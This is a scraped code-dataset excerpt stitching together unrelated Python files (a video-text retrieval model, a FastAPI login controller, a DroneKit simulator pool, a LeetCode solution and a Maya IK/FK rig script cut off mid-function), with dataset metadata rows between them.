rel_edges = torch.FloatTensor(batch_data['rel_edges']).to(self.device) ## batch*(1+n_v+n_n)*(1+n_v+n_n)
verb_lens = torch.sum(verb_masks, 2)
noun_lens = torch.sum(noun_masks, 2)
# sent_embeds: (batch, dim_embed)
# verb_embeds, noun_embeds: (batch, num_xxx, dim_embed)
sent_embeds, verb_embeds, noun_embeds, local_sent_embeds, sent_logits = self.submods[TXTENC](
sent_ids, sent_lens, verb_masks, noun_masks, node_roles, rel_edges)
return {
'sent_embeds': sent_embeds, 'sent_lens': sent_lens,
'verb_embeds': verb_embeds, 'verb_lens': verb_lens,
'noun_embeds': noun_embeds, 'noun_lens': noun_lens,
'sent_logits': sent_logits, 'local_sent_embeds': local_sent_embeds,
}
def generate_phrase_scores(self, vid_embeds, vid_masks, phrase_embeds, phrase_masks, mask_flag=False):
'''Args:
- vid_embeds: (batch, num_frames, embed_size)
- vid_masks: (batch, num_frames)
- phrase_embeds: (batch, num_phrases, embed_size)
- phrase_masks: (batch, num_phrases)
'''
batch_vids, num_frames, _ = vid_embeds.size()
vid_pad_masks = (vid_masks == 0).unsqueeze(1).unsqueeze(3)
batch_phrases, num_phrases, dim_embed = phrase_embeds.size()
# compute component-wise similarity
vid_2d_embeds = vid_embeds.view(-1, dim_embed)
phrase_2d_embeds = phrase_embeds.view(-1, dim_embed)
# size = (batch_vids, batch_phrases, num_frames, num_phrases)
ground_sims = cosine_sim(vid_2d_embeds, phrase_2d_embeds).view(
batch_vids, num_frames, batch_phrases, num_phrases).transpose(1, 2)
###
if mask_flag:
vid_attn_per_word = ground_sims.masked_fill(vid_pad_masks, 0) ##############
else:
vid_attn_per_word = ground_sims
vid_attn_per_word[vid_attn_per_word < 0] = 0
vid_attn_per_word = framework.ops.l2norm(vid_attn_per_word, dim=2)
if mask_flag:
vid_attn_per_word = vid_attn_per_word.masked_fill(vid_pad_masks, -1e18) #################
vid_attn_per_word = torch.softmax(self.config.simattn_sigma * vid_attn_per_word, dim=2)
if self.config.attn_fusion == 'embed':
vid_attned_embeds = torch.einsum('abcd,ace->abde', vid_attn_per_word, vid_embeds)
word_attn_sims = torch.einsum('abde,bde->abd',
framework.ops.l2norm(vid_attned_embeds),
framework.ops.l2norm(phrase_embeds))
elif self.config.attn_fusion == 'sim':
# (batch_vids, batch_phrases, num_phrases)
word_attn_sims = torch.sum(ground_sims * vid_attn_per_word, dim=2)
# sum: (batch_vid, batch_phrases)
phrase_scores = torch.sum(word_attn_sims * phrase_masks.float().unsqueeze(0), 2) \
/ torch.sum(phrase_masks, 1).float().unsqueeze(0).clamp(min=1)
return phrase_scores
def generate_scores(self, **kwargs):
##### shared #####
vid_lens = kwargs['vid_lens'] # (batch, )
num_frames = int(kwargs['max_len'])###########################kwargs['vid_verb_embeds'].size(1)
vid_masks = framework.ops.sequence_mask(vid_lens, num_frames, inverse=False)
# batch*max_len
##### sentence-level scores #####
sent_scores = cosine_sim(kwargs['vid_sent_embeds'], kwargs['sent_embeds'])
#######################################################
# concept scores use jaccard similarity
concept_verb_scores = self.jaccard_sim(kwargs['logits'][0], kwargs['sent_logits'][0])
concept_noun_scores = self.jaccard_sim(kwargs['logits'][1], kwargs['sent_logits'][1])
#######################################################
##### verb-level scores #####
vid_verb_embeds = kwargs['vid_verb_embeds'] # (batch, num_frames, dim_embed)
verb_embeds = kwargs['verb_embeds'] # (batch, num_verbs, dim_embed)
verb_lens = kwargs['verb_lens'] # (batch, num_verbs)
local_vid_embeds =kwargs['local_vid_embeds']
local_sent_embeds = kwargs['local_sent_embeds']
verb_masks = framework.ops.sequence_mask(torch.sum(verb_lens > 0, 1).long(),
self.config.num_verbs, inverse=False)
# sum: (batch_vids, batch_sents)
verb_scores = self.generate_phrase_scores(vid_verb_embeds, vid_masks, verb_embeds, verb_masks)
ind_verb_scores = self.generate_phrase_scores(local_vid_embeds[0], vid_masks, local_sent_embeds[0], verb_masks, True)
##### noun-level scores #####
vid_noun_embeds = kwargs['vid_noun_embeds'] # (batch, num_frames, dim_embed)
noun_embeds = kwargs['noun_embeds'] # (batch, num_nouns, dim_embed)
noun_lens = kwargs['noun_lens'] # (batch, num_nouns)
noun_masks = framework.ops.sequence_mask(torch.sum(noun_lens > 0, 1).long(),
self.config.num_nouns, inverse=False)
# sum: (batch_vids, batch_sents)
noun_scores = self.generate_phrase_scores(vid_noun_embeds, vid_masks, noun_embeds, noun_masks)
ind_noun_scores = self.generate_phrase_scores(local_vid_embeds[1], vid_masks, local_sent_embeds[1], noun_masks, True)
return sent_scores, verb_scores, noun_scores, concept_verb_scores, concept_noun_scores, ind_verb_scores, ind_noun_scores
def jaccard_sim(self, im, s):
im_bs = im.size(0)
s_bs = s.size(0)
im = im.unsqueeze(1).expand(-1, s_bs, -1)
s = s.unsqueeze(0).expand(im_bs, -1, -1)
intersection = torch.min(im, s).sum(-1)
union = torch.max(im, s).sum(-1)
score = intersection / union
return score
def forward_loss(self, batch_data, step=None):
enc_outs = self.forward_video_embed(batch_data)
cap_enc_outs = self.forward_text_embed(batch_data)
enc_outs.update(cap_enc_outs)
sent_scores, verb_scores, noun_scores, concept_verb_scores, concept_noun_scores, local_verb_scores, local_noun_scores = self.generate_scores(**enc_outs)
scores = (sent_scores + verb_scores + noun_scores + local_verb_scores + local_noun_scores) / 5
scores2 = (concept_verb_scores + concept_noun_scores) / 2
sent_loss = self.criterion(sent_scores)
verb_loss = self.criterion(verb_scores)
noun_loss = self.criterion(noun_scores)
eta = 0.1
mu = 0.01
concept_verb_loss = 0.5*self.criterion(concept_verb_scores)
concept_noun_loss = 0.5*self.criterion(concept_noun_scores)
concept_loss = eta*self.criterion(scores2)
verb_concept_label = torch.FloatTensor(batch_data['verb_concept_label']).to(self.device)
noun_concept_label = torch.FloatTensor(batch_data['noun_concept_label']).to(self.device)
verb_concept_mask = torch.FloatTensor(batch_data['verb_concept_mask']).to(self.device)
noun_concept_mask = torch.FloatTensor(batch_data['noun_concept_mask']).to(self.device)
v_mask_sum = torch.sum(verb_concept_mask, dim=1)
n_mask_sum = torch.sum(noun_concept_mask, dim=1)
vbce_loss = torch.sum(verb_concept_mask*self.criterion_bce(enc_outs['logits'][0], verb_concept_label), dim=1)
vbce_loss = mu*torch.mean(vbce_loss/v_mask_sum)
nbce_loss = torch.sum(noun_concept_mask*self.criterion_bce(enc_outs['logits'][1], noun_concept_label), dim=1)
nbce_loss = mu*torch.mean(nbce_loss/n_mask_sum)
vbce_sent_loss = torch.sum(verb_concept_mask*self.criterion_bce(enc_outs['sent_logits'][0], verb_concept_label), dim=1)
vbce_sent_loss = mu*torch.mean(vbce_sent_loss/v_mask_sum)
nbce_sent_loss = torch.sum(noun_concept_mask*self.criterion_bce(enc_outs['sent_logits'][1], noun_concept_label), dim=1)
nbce_sent_loss = mu*torch.mean(nbce_sent_loss/n_mask_sum)
fusion_loss = self.criterion(scores)
if self.config.loss_weights is None:
loss = fusion_loss + 1*(vbce_loss+nbce_loss) + 1*(vbce_sent_loss+nbce_sent_loss) + concept_loss
else:
loss = self.config.loss_weights[0] * fusion_loss + \
self.config.loss_weights[1] * sent_loss + \
self.config.loss_weights[2] * verb_loss + \
self.config.loss_weights[3] * noun_loss + \
vbce_loss + nbce_loss
if step is not None and self.config.monitor_iter > 0 and step % self.config.monitor_iter == 0:
neg_scores = scores.masked_fill(torch.eye(len(scores), dtype=torch.bool).to(self.device), -1e10)
self.print_fn('\tstep %d: pos mean scores %.2f, hard neg mean scores i2t %.2f, t2i %.2f'%(
step, torch.mean(torch.diag(scores)), torch.mean(torch.max(neg_scores, 1)[0]),
torch.mean(torch.max(neg_scores, 0)[0])))
self.print_fn('\tstep %d: sent_loss %.4f, verb_loss %.4f, noun_loss %.4f, fusion_loss %.4f'%(
step, sent_loss.data.item(), verb_loss.data.item(), noun_loss.data.item(), fusion_loss.data.item()))
self.print_fn('\tstep %d: vbce_loss %.4f, nbce_loss %.4f'%(step, vbce_loss.item(), nbce_loss.item()))
self.print_fn('\tstep %d: vbce_sent_loss %.4f, nbce_sent_loss %.4f'%(step, vbce_sent_loss.item(), nbce_sent_loss.item()))
self.print_fn('\tstep %d: sim_loss %.4f, vsim_loss %.4f, nsim_loss %.4f'%(step, concept_loss.item(),
concept_verb_loss.item(), concept_noun_loss.item()))
return loss
def evaluate_scores(self, tst_reader):
K = self.config.subcfgs[VISENC].num_levels
K = K + 4
assert K == 7, 'Note that this error indicates losing other scores!'
vid_names, all_scores = [], [[] for _ in range(K)]
cap_names = tst_reader.dataset.captions
for vid_data in tst_reader:
vid_names.extend(vid_data['names'])
vid_enc_outs = self.forward_video_embed(vid_data)
for k in range(K):
all_scores[k].append([])
ijj = 0
for cap_data in tst_reader.dataset.iterate_over_captions(self.config.tst_batch_size):
cap_enc_outs = self.forward_text_embed(cap_data)
cap_enc_outs.update(vid_enc_outs)
indv_scores = self.generate_scores(**cap_enc_outs)
for k in range(K):
all_scores[k][-1].append(indv_scores[k].data.cpu().numpy())
ijj += 0
for k in range(K):
all_scores[k][-1] = np.concatenate(all_scores[k][-1], axis=1)
for k in range(K):
all_scores[k] = np.concatenate(all_scores[k], axis=0) # (n_img, n_cap)
all_scores = np.array(all_scores) # (k, n_img, n_cap)
return vid_names, cap_names, all_scores
def evaluate(self, tst_reader, return_outs=False):
vid_names, cap_names, scores = self.evaluate_scores(tst_reader)
i2t_gts = []
for vid_name in vid_names:
i2t_gts.append([])
for i, cap_name in enumerate(cap_names):
if cap_name in tst_reader.dataset.ref_captions[vid_name]:
i2t_gts[-1].append(i)
t2i_gts = {}
for i, t_gts in enumerate(i2t_gts):
for t_gt in t_gts:
t2i_gts.setdefault(t_gt, [])
t2i_gts[t_gt].append(i)
idx = [0, 1, 2, 5, 6]
fused_scores = (np.mean(scores[idx], 0) + np.mean(scores[3:5], 0))/2
metrics = self.calculate_metrics(fused_scores, i2t_gts, t2i_gts)
if return_outs:
outs = {
'vid_names': vid_names,
'cap_names': cap_names,
'scores': scores,
}
return metrics, outs
else:
return metrics
| 46.939716 | 156 | 0.694568 | 12,949 | 0.978243 | 0 | 0 | 0 | 0 | 0 | 0 | 2,402 | 0.181461 |
6a186a13afeea2c9ca39fb78982684eb10c871db | 3,784 | py | Python | bench_fastapi/authentication/controllers/login.py | sharkguto/teste_carga | 56d6e9dcbd3e7b7fe7295d8fcf4b4e8b84943cfb | [
"MIT"
] | 1 | 2021-10-14T07:27:47.000Z | 2021-10-14T07:27:47.000Z | bench_fastapi/authentication/controllers/login.py | sharkguto/teste_carga | 56d6e9dcbd3e7b7fe7295d8fcf4b4e8b84943cfb | [
"MIT"
] | 4 | 2019-08-06T02:26:32.000Z | 2021-06-10T21:39:19.000Z | bench_fastapi/authentication/controllers/login.py | sharkguto/teste_carga | 56d6e9dcbd3e7b7fe7295d8fcf4b4e8b84943cfb | [
"MIT"
] | 1 | 2018-05-11T18:04:41.000Z | 2018-05-11T18:04:41.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# login.py
# @Author : Gustavo Freitas ([email protected])
# @Link :
# @Date : 12/12/2019, 11:43:07 AM
from typing import Optional, Any
from fastapi import APIRouter, Body, Depends, HTTPException
from fastapi import Header, Security
from authentication.models.users import User
from fastapi.security import HTTPBasic, HTTPBasicCredentials, APIKeyHeader
from typing import List
from starlette.responses import Response
from fastapi.encoders import jsonable_encoder
from authentication.interfaces.database import database
import jwt
from starlette.status import HTTP_400_BAD_REQUEST, HTTP_401_UNAUTHORIZED
from datetime import datetime, timedelta
from hashlib import sha256
from authentication.interfaces.token import verify_token
router = APIRouter()
security = HTTPBasic(auto_error=True)
api_key = APIKeyHeader(name="x-api-key", auto_error=True)
@router.post("/login", tags=["token"])
async def renew_token(
response: Response,
user: dict = Depends(verify_token),
x_api_key: str = Header(None),
):
response.headers["x-api-key"] = x_api_key
return {"verified": True, "user": user["email"]}
@router.put("/login", tags=["token"])
async def renew_token(response: Response, user: dict = Depends(verify_token)):
sql = """UPDATE users.tbl_users
SET token = :token WHERE
id = :id"""
token = f"{user['pwd_updated_at']}-{user['email']}-{datetime.now()}"
mhash = sha256(token.encode("utf-8"))
token = mhash.hexdigest()
await database.execute(query=sql, values={"id": user["id"], "token": token})
response.headers["x-api-key"] = jwt.encode(
{**user, **dict(exp=(datetime.now() + timedelta(hours=8)))},
token,
algorithm="HS256",
).decode()
return {"renew": True}
# @router.post("/login", dependencies=[Depends(verify_token)])
# async def renew_token(x_api_key: str = Header(None)):
# return {"ok": x_api_key}
@router.get(
"/login", response_model=User, tags=["auth"], response_model_exclude_unset=True
)
async def login_basic(
response: Response, authorization: HTTPBasicCredentials = Security(security)
):
sql = """SELECT tu.id, tu.email, tu."name", tu.linkedin_id , tu.pwd_updated_at
FROM users.tbl_users tu
WHERE tu.passwd is NOT NULL
AND tu.passwd = crypt(:secret,tu.passwd)
AND tu.email = :email
AND tu.enabled = true """
users = await database.fetch_one(
query=sql,
values={"email": authorization.username, "secret": authorization.password},
)
if not users:
raise HTTPException(status_code=HTTP_401_UNAUTHORIZED)
user = jsonable_encoder(users)
sql = """SELECT tp.acl_profile as profile
FROM users.tbl_users tu inner join
users.tbl_profile_users tpu on tpu.id_users = tu.id inner join
users.tbl_profile tp on tp.id = tpu.id_profile
WHERE tu.passwd is NOT NULL
AND tu.passwd = crypt(:secret,tu.passwd)
AND tu.email = :email"""
profiles = await database.fetch_all(
query=sql,
values={"email": authorization.username, "secret": authorization.password},
)
if not profiles:
raise HTTPException(status_code=HTTP_401_UNAUTHORIZED)
user["acl"] = jsonable_encoder(profiles)
sql = """UPDATE users.tbl_users
SET token = :token WHERE
id = :id"""
token = f"{user['pwd_updated_at']}-{authorization.username}-{datetime.now()}"
mhash = sha256(token.encode("utf-8"))
token = mhash.hexdigest()
await database.execute(query=sql, values={"id": user["id"], "token": token})
response.headers["x-api-key"] = jwt.encode(
{**user, **dict(exp=(datetime.now() + timedelta(hours=8)))},
token,
algorithm="HS256",
).decode()
return user
| 29.795276 | 83 | 0.681818 | 0 | 0 | 0 | 0 | 2,721 | 0.71908 | 2,545 | 0.672569 | 1,317 | 0.348044 |
6a190e5eb1440e6a01fc6f170da74507f39571ac | 6,295 | py | Python | dronesym-python/flask-api/src/dronepool.py | dilinade/DroneSym | 30073bd31343bc27c6b8d72e48b4e06ced0c5fe6 | [
"Apache-2.0"
] | 1 | 2019-03-24T23:50:07.000Z | 2019-03-24T23:50:07.000Z | dronesym-python/flask-api/src/dronepool.py | dilinade/DroneSym | 30073bd31343bc27c6b8d72e48b4e06ced0c5fe6 | [
"Apache-2.0"
] | null | null | null | dronesym-python/flask-api/src/dronepool.py | dilinade/DroneSym | 30073bd31343bc27c6b8d72e48b4e06ced0c5fe6 | [
"Apache-2.0"
] | null | null | null | #DronePool module which handles interaction with SITLs
from dronekit import Vehicle, VehicleMode, connect
from dronekit_sitl import SITL
from threading import Lock
import node, time
import mavparser
import threadrunner
drone_pool = {}
instance_count = 0
env_test = False
q = None
mq = None
lock = Lock()
class Sim(SITL, object):
def __init__(self, instance=1, home=None):
super(Sim, self).download("copter", "3.3", verbose=not env_test)
self.instance = instance
if home:
self.home = home
else:
self.home = {"lat":6.9271, "lon":79.8612, "alt": 1}
self.p = None
return
def connection_string(self):
return super(Sim, self).connection_string()[:-4] + str(5760 + self.instance * 10)
def launch(self):
home_str = str(self.home['lat']) + ',' + str(self.home['lon']) + ',0,353'
super(Sim, self).launch(["--instance", str(self.instance), "--home", home_str], await_ready=True, verbose=not env_test)
def get_sitl_status(self):
return { 'id': self.instance, 'home': self.home }
def initialize():
global q, mq, instance_count
q = threadrunner.q
mq = threadrunner.mq
drones = node.get_drones()['drones']
if not drones:
return
for drone_id in drones:
if drone_id not in list(drone_pool.keys()):
drone = node.get_drone_by_id(drone_id)
location = drone['location']
q.put((create_new_drone, { "db_key" : drone_id, "home" : location }))
if 'status' in list(drone.keys()) and drone['status'] == 'FLYING':
q.put((resume_flight, { "drone_id" : drone_id }))
def resume_flight(kwargs):
drone_id = kwargs.get("drone_id", None)
drone = node.get_drone_by_id(drone_id)
waypoints = []
for wp in sorted(drone['waypoints']):
waypoints.append(drone['waypoints'][wp])
next_waypoint = waypoints.index(drone['waypoint'])
print (next_waypoint)
q.put((takeoff_drone, { "drone_id" : drone_id, "waypoints" : waypoints[next_waypoint:] }))
def create_new_drone(kwargs):
global instance_count
instance_count += 1
home = kwargs.get("home", None)
db_key = kwargs.get("db_key", None)
retries = 3
drone = Sim(instance_count, home)
drone.launch()
while retries > 0:
try:
drone_conn = connect(drone.connection_string(), wait_ready=True)
break
except:
print ("Retrying...")
retries -= 1
drone_pool[db_key] = drone_conn
res = { "status" : "OK", "id" : db_key }
return res
def remove_drone(kwargs):
drone_id = kwargs.get("drone_id", None)
if drone_id not in drone_pool:
return { "status" : "ERROR", "msg" : "Drone instance not found" }
drone = drone_pool[drone_id]
if drone.mode == VehicleMode('AUTO'):
return { "status" : "ERROR", "msg" : "Drone in operation" }
del drone_pool[drone_id]
return { "status" : "OK", "id" : drone_id }
def run_mission(drone, target_height, waypoints):
while True:
print(("Reaching target alt : " + str(drone.location.global_relative_frame.alt)))
if drone.location.global_relative_frame.alt >= target_height * 0.9:
break
print ('target alt reached')
mavparser.create_mission(drone, waypoints)
print ('mission acquired')
drone.mode = VehicleMode('AUTO')
print ('initiating sequence')
print ('in mission')
def attach_listener(kwargs):
attr = kwargs.get('attr', None)
fn = kwargs.get('fn', None)
attach_fn = kwargs.get('attach_fn', None)
if not fn == None and not attr == None and not attach_fn == None:
attach_fn(attr, fn)
def takeoff_drone(kwargs):
global q
drone_id = kwargs.get("drone_id", None)
target_height = kwargs.get("target_height", 10)
waypoints = kwargs.get("waypoints", None)
try:
drone = drone_pool[drone_id]
except:
raise
drone.initialize()
drone.mode = VehicleMode('GUIDED')
drone.armed = True
while not drone.armed:
time.sleep(1)
drone.simple_takeoff(target_height)
print (waypoints)
if waypoints:
run_mission(drone, target_height, waypoints)
def detach_event_listeners(drone, value, status):
drone.remove_attribute_listener('location', update_location)
drone.remove_attribute_listener('airspeed', update_airspeed)
drone.remove_attribute_listener('attitude', udpate_attitude)
drone.remove_attribute_listener('heading', update_heading)
node.update_drone(drone_id, { "location" : {"lat": value.global_relative_frame.lat, "lon": value.global_relative_frame.lon, "alt": value.global_relative_frame.alt}, "status": status})
return
def update_location(self, attr_name, value):
node.update_drone(drone_id, { "location" : {"lat": value.global_relative_frame.lat, "lon": value.global_relative_frame.lon, "alt": value.global_relative_frame.alt}, "status": "FLYING"})
command_len = len(drone.commands)
wp_len = len(waypoints)
if command_len >= wp_len :
diff = command_len - wp_len
next_wp = max(drone.commands.__next__ - diff, 0) % len(waypoints)
waypoint = waypoints[next_wp]
# print "df: " + `diff`
# print next_wp
node.update_drone(drone_id, { "waypoint" : waypoint })
if drone.mode == VehicleMode('LAND') and drone.location.global_relative_frame.alt <= 0.1:
detach_event_listeners(drone, value, "HALTED")
return
if drone.commands.__next__ == len(drone.commands):
detach_event_listeners(drone, value, "FINISHED")
return
def update_airspeed(self, attr_name, value):
node.update_drone(drone_id, {"airspeed": value})
def udpate_attitude(self, attr_name, value):
node.update_drone(drone_id, { "pitch": value.pitch, 'roll': value.roll, 'yaw': value.yaw })
def update_heading(self, attr_name, value):
node.update_drone(drone_id, { "heading": value })
mq.put((attach_listener, { "attach_fn" : drone.add_attribute_listener, "attr" : 'location', "fn" : update_location }))
mq.put((attach_listener, { "attach_fn" : drone.add_attribute_listener, "attr" : 'airspeed', "fn" : update_airspeed }))
mq.put((attach_listener, { "attach_fn" : drone.add_attribute_listener, "attr" : 'attitude', "fn" : udpate_attitude }))
mq.put((attach_listener, { "attach_fn" : drone.add_attribute_listener, "attr" : 'heading', "fn" : update_heading }))
print ('took off')
return True
def land_drone(kwargs):
drone_id = kwargs.get("drone_id", None)
try:
drone = drone_pool[drone_id]
except:
raise
if not drone.armed:
return False
cmds = drone.commands
cmds.wait_ready()
cmds.clear()
drone.mode = VehicleMode('LAND')
print((drone.mode))
return True
| 27.133621 | 187 | 0.707705 | 697 | 0.110723 | 0 | 0 | 0 | 0 | 0 | 0 | 960 | 0.152502 |
6a19dea1f3bc079f6c50613369f0699df82e34cf | 2,365 | py | Python | Problemset/longest-string-chain/longest-string-chain.py | KivenCkl/LeetCode | fcc97c66f8154a5d20c2aca86120cb37b9d2d83d | [
"MIT"
] | 7 | 2019-05-08T03:41:05.000Z | 2020-12-22T12:39:43.000Z | Problemset/longest-string-chain/longest-string-chain.py | Yuziquan/LeetCode | 303fc1c8af847f783c4020bd731b28b72ed92a35 | [
"MIT"
] | 1 | 2021-07-19T03:48:35.000Z | 2021-07-19T03:48:35.000Z | Problemset/longest-string-chain/longest-string-chain.py | Yuziquan/LeetCode | 303fc1c8af847f783c4020bd731b28b72ed92a35 | [
"MIT"
] | 7 | 2019-05-10T20:43:20.000Z | 2021-02-22T03:47:35.000Z |
# @Title: 最长字符串链 (Longest String Chain)
# @Author: KivenC
# @Date: 2019-05-26 20:35:25
# @Runtime: 144 ms
# @Memory: 13.3 MB
class Solution:
# # way 1
# def longestStrChain(self, words: List[str]) -> int:
# # 动态规划
# # dp[i] = max(dp[i], dp[j] + 1) (0 <= j < i 且 words[j] 是 words[i] 的前身)
# length = len(words)
# if length < 2:
# return length
# dp = [1 for _ in range(length)]
# words.sort(key=len) # 按字符串长度递增排序
# for i in range(1, length):
# if i >= 1 and words[i] == words[i - 1]: # 去重
# continue
# for j in range(i - 1, -1, -1):
# if len(words[i]) - len(words[j]) > 1: # 剪枝
# break
# if len(words[i]) == len(words[j]):
# continue
# if self.isPre(words[j], words[i]):
# dp[i] = max(dp[i], dp[j] + 1)
# return max(dp)
# def isPre(self, word1: str, word2: str) -> bool:
# # 判断 word1 是否是 word2 的前身
# # 双指针
# # i, j, length1, length2 = 0, 0, len(word1), len(word2)
# # while i < length1 and j < length2:
# # if word1[i] == word2[j]:
# # i += 1
# # j += 1
# # if length2 - length1 == 1 and i == length1:
# # return True
# # return False
# # word2 去除任意一个位置的字符后与 word1 进行比对
# if len(word1) + 1 != len(word2):
# return False
# for i in range(len(word2)):
# if word2[: i] + word2[i + 1:] == word1:
# return True
# return False
# way 2
def longestStrChain(self, words: List[str]) -> int:
import collections
length = len(words)
if length < 2:
return length
pool = collections.defaultdict(list) # 将字符串按照其长度进行分组
dp = {}
for word in words:
pool[len(word)].append(word)
for key in sorted(pool.keys()):
if key - 1 not in pool:
continue
for word in pool[key]:
for j in range(key):
tmp = word[: j] + word[j + 1:]
if tmp in pool[key - 1]:
dp[word] = max(dp.get(word, 1), dp.get(tmp, 1) + 1)
return max(dp.values()) if dp else 1
| 33.785714 | 81 | 0.442283 | 2,365 | 0.944112 | 0 | 0 | 0 | 0 | 0 | 0 | 1,734 | 0.692216 |
6a19e8bf83375a817e65cca3fb4f7daafac8434e | 21,107 | py | Python | IKFK Builder/IKFK_Builder.py | ssimbox/ssimbox-rigTools | 824bc3b90c42ab54d01b4b0007f00e7cc2f2f08c | [
"MIT"
] | 1 | 2021-01-19T13:36:42.000Z | 2021-01-19T13:36:42.000Z | IKFK Builder/IKFK_Builder.py | ssimbox/sbx-autorig | 824bc3b90c42ab54d01b4b0007f00e7cc2f2f08c | [
"MIT"
] | 2 | 2021-03-29T22:15:08.000Z | 2021-03-29T22:17:37.000Z | IKFK Builder/IKFK_Builder.py | ssimbox/ssimbox-rigTools | 824bc3b90c42ab54d01b4b0007f00e7cc2f2f08c | [
"MIT"
] | null | null | null | from ctrlUI_lib import createClav2, createSphere
import maya.cmds as cmds
import maya.OpenMaya as om
from functools import partial
def duplicateChain(*args):
global ogChain
global chainLen
global switcherLoc
global side
global controllerColor
global clavCheckbox
global rigGrp, ctrlGrp
ogRootchain = cmds.ls(sl = True, type = "joint")[0]
ogChain = cmds.listRelatives(ogRootchain, ad = True, type = "joint")
ogChain.append(ogRootchain)
ogChain.reverse()
side = ogRootchain[0:2]
# Initialize input from UI
scaleController = cmds.intField(scaleField_UI, q=1, v=1)
blendCheckbox = cmds.checkBox(blendCheckbox_UI, q=1, v=1)
constraintCheckBox = cmds.checkBox(constraintCheckBox_UI, q=1, v=1)
chainMenu = cmds.optionMenu("chainMenu_UI", q=1, v=1)
clavCheckbox = cmds.checkBox(clavCheckbox_UI, q=1, v=0)
if side == "l_": controllerColor = rgb=(0, 0, 255)
elif side == "r_": controllerColor = rgb=(255, 0, 0)
if chainMenu == "Leg": chainLen = 5
else: #this is totally unscalable but for now it's ok
chainLen = 3
#suffix for the new chains
newJointList = ["_ik", "_fk", "_scale"]
for newJoint in newJointList:
for i in range(chainLen):
if blendCheckbox == 0 and constraintCheckBox == 0:
cmds.error("pls, select one relation type")
break
newJointName = ogChain[i] + newJoint
#create a joint, copy their position and freeze transform
cmds.joint(n = newJointName)
cmds.matchTransform(newJointName, ogChain[i])
cmds.makeIdentity(newJointName, a = 1, t = 0, r = 1, s = 0)
#deselect to make the two different hierarchies
cmds.select(cl = 1)
cmds.parent((ogChain[0] + "_ik"), world = True)
cmds.setAttr(ogChain[0] + "_ik.visibility", 0)
cmds.setAttr(ogChain[0] + "_fk.visibility", 0)
# Create a locator used for switching IK/FK mode and snap it between two joints
switcherLoc = cmds.spaceLocator(n=side + chainMenu + "_ikfk_Switch")
switcherLocGrp = cmds.group(em=1, n=switcherLoc[0] + "_grp")
cmds.color(switcherLoc, rgb=(255, 255, 0)) #yellow
cmds.delete(cmds.pointConstraint(switcherLoc, switcherLocGrp))
cmds.parent(switcherLoc, switcherLocGrp)
cmds.delete(cmds.pointConstraint(ogChain[1], ogChain[2], switcherLocGrp))
cmds.addAttr(switcherLoc, ln="FKIK_Mode", at="short", min=0, max=1, k=1, r=1)
cmds.move(0,0,-12, switcherLocGrp, r=1) #IMPROVE THIS SHIT
cmds.parentConstraint(ogChain[1], switcherLocGrp, mo=1)
#remove .t, .r, .s and .v from the channelbox
for coord in ["X", "Y", "Z"]:
cmds.setAttr(switcherLoc[0] + ".translate" + coord, k=0, l=1)
cmds.setAttr(switcherLoc[0] + ".rotate" + coord, k=0, l=1)
cmds.setAttr(switcherLoc[0] + ".scale" + coord, k=0, l=1)
cmds.setAttr(switcherLoc[0] + ".visibility", k=0, l=1)
# Create hierarchy groups
rigGrp = cmds.group(em=1, n= side + chainMenu + "_rig_grp")
ctrlGrp = cmds.group(em=1, n= side + chainMenu + "_ctrl_grp")
cmds.delete(cmds.parentConstraint(ogChain[0], rigGrp))
cmds.delete(cmds.parentConstraint(ogChain[0], ctrlGrp))
cmds.parent(ctrlGrp, rigGrp)
# Execute
if blendCheckbox == 1:
blendNodeFunc(scaleController, chainMenu)
if constraintCheckBox == 1:
constraintFunc(scaleController, chainMenu)
if clavCheckbox == 1:
clavSel(scaleController)
else:
cmds.parent(ogChain[0] + "_ik", ogChain[0] + "_fk", ctrlGrp)
cmds.parent(ogChain[0] + "_fk_anim_grp", ctrlGrp)
cmds.parent(switcherLocGrp, rigGrp)
def clavSel(scaleClav):
# Select clavicle Joint moving up and put it at the top of the chain
clavJoint = cmds.pickWalk(ogChain[0], d="up")[0]
#ogChain.insert(0, clavJoint)
clavController = createClav2(clavJoint + "_anim") # Import coordinates from ctrlUI_lib
cmds.delete(cmds.pointConstraint(clavJoint, clavController))
# Create offset group, FDH and move up
clavControllerGrp = cmds.group(n=clavController + "_grp", em=1)
cmds.delete(cmds.parentConstraint(clavJoint, clavControllerGrp))
cmds.parent(clavController, clavControllerGrp)
fixedScale = scaleClav/4
cmds.scale(fixedScale, fixedScale, fixedScale, clavController)
cmds.makeIdentity(clavController, a=1)
cmds.move(0,10,0, clavControllerGrp, ws=1, r=1)
cmds.color(clavController, rgb=controllerColor)
# Move pivots on clavicle joint
piv = cmds.xform(clavJoint, q=True, ws=True, t=True)
cmds.xform(clavController, ws=True, piv=piv)
cmds.xform(clavControllerGrp, ws=True, piv=piv)
cmds.orientConstraint(clavController, clavJoint)
# Parent ik and fk chain under clavicle controller
cmds.parent((ogChain[0]+"_fk_anim_grp"),(ogChain[0] + "_ik"), (ogChain[0] + "_fk"), clavController)
cmds.parent(clavControllerGrp, ctrlGrp)
def visCheck(vis):
if vis == "Arm":
asd = True
if vis == "Leg":
asd = False
cmds.checkBox(clavCheckbox_UI, e=1, vis=asd, v=asd)
# Buttons +1 and +3
count = 0
def addOneUnit(*args):
global count
count = count + 1
cmds.intField(scaleField_UI, v=1+count, e=1)
def addThreeUnit(*args):
global count
count = count + 3
cmds.intField(scaleField_UI, v=1+count, e=1)
def blendNodeFunc(scaleController, selectChain):
# Create some blendColors node with the same name of the joint
for x in range(chainLen):
blendColorsNode = cmds.createNode("blendColors", n = ogChain[x] + "_blend")
# Connect FK and IK chains into blendColors channels and then connect the output to the original joint chain
cmds.connectAttr((ogChain[x] + "_ik.rotate"), blendColorsNode + ".color1")
cmds.connectAttr((ogChain[x] + "_fk.rotate"), blendColorsNode + ".color2")
cmds.connectAttr((blendColorsNode + ".output"), (ogChain[x] + ".rotate" ))
cmds.connectAttr(switcherLoc[0]+".FKIK_Mode", blendColorsNode + ".blender")
ikChainBuild(scaleController, selectChain)
fkControllerCreator(scaleController, selectChain)
def constraintFunc(scaleController, selectChain):
# Create some blendColors node with the same name of the joint
for x in range(chainLen):
# Setup orient constraints
cmds.parentConstraint((ogChain[x] + "_ik"), ogChain[x])
cmds.parentConstraint((ogChain[x] + "_fk"), ogChain[x])
# Setup SDK naming convention
sdkDriver = switcherLoc[0] + ".FKIK_Mode"
ikSdkDriven = ogChain[x] + "_parentConstraint1." + ogChain[x] + "_ikW0"
fkSdkDriven = ogChain[x] + "_parentConstraint1." + ogChain[x] + "_fkW1"
# Setup SDK
